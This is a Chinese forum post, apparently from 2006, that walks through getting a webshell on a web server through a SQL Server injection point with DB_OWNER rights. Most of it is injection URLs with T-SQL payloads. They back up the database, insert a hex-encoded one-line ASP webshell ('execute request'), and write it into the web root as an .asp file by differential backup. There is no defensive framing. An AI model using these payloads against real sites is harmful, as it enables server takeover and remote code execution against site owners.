服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4075|回复: 0

sql数据库DB_OWER权限得到WEBSHELL(前提:注入点可以列目录)

[复制链接]
dirtysea 发表于 2006-5-18 03:08:04 | 显示全部楼层 |阅读模式

前提条件:sql数据库DB_OWER权限,可以列目录

 

 
 

先找到web目录,然后backup,找web可以先试试读注册表,nbsi里面有自己找找吧.
backup有三种方式拿shell, backup database,backup log,还有二次备份..

备份差异的方法:
http://localhost/news/newcode.asp?id=1466为注入点,为DB_OWNER权限
通过注入点要得到虚礼目录: d:\www\
1:输入http://localhost/news/newcode.asp? ...  @a sysname,@s varchar(4000) select @a=db_name(),@s=0x71697169 backup database @a to disk=@s--
为备份为名qiqi的数据库!
0x71697169 是数据库的名字转16进制了.


2:http://localhost/news/newcode.asp?id=137;Drop table [qiqi];create table 
[dbo].[qiqi] ([cmd] [image])--
建表加字段

3:http://localhost/news/newcode.asp?id=137;i ... bsp;qiqi(cmd) values
(0x3C256578656375746520726571756573742822302229253E)--
这样就是在数据库中插入一句话木马
0x3C256578656375746520726571756573742822302229253E是一句话木马
<%execute request("0")%> 的16进制代码

4:http://localhost/news/newcode.asp? ...  @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7777775C6E6577735C716971692E6173700 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
就是这样把一句话木马当作数据库的差异备份出到d:\www\news\qiqi.asp

0x643A5C7777775C6E6577735C716971692E617370是WEB物理路径径:d:\www\news\qiqi.asp的16进制代码.


5:http://localhost/news/newcode.asp?id=137;Drop table [qiqi]--
最后撤除刚刚建立的库


然后我们访问刚刚备份得出的http://localhost/news/qiqi.asp,可以看到了一大堆乱码,我们看看网页的最底,如果出现错误就表示插入木马成功了.

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-5-5 10:43 , Processed in 0.183781 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表